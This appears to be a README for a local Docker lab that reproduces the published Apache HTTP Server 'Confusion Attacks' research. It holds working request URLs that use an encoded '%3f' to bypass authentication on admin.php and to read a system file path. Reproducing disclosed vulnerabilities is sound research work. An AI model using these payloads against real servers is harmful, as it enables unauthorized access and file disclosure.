Repro for Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!
Discovered by https://x.com/orange_8361
https://blog.orange.tw/posts/2024-08-confusion-attacks-en/
docker build -t my-php-website .
docker run -p 80:80 my-php-website
http://127.0.0.1/admin.php => 401
http://127.0.0.1/admin.php%3ftest.php => 200
http://127.0.0.1/html/usr/share/doc/hostname/copyright%3f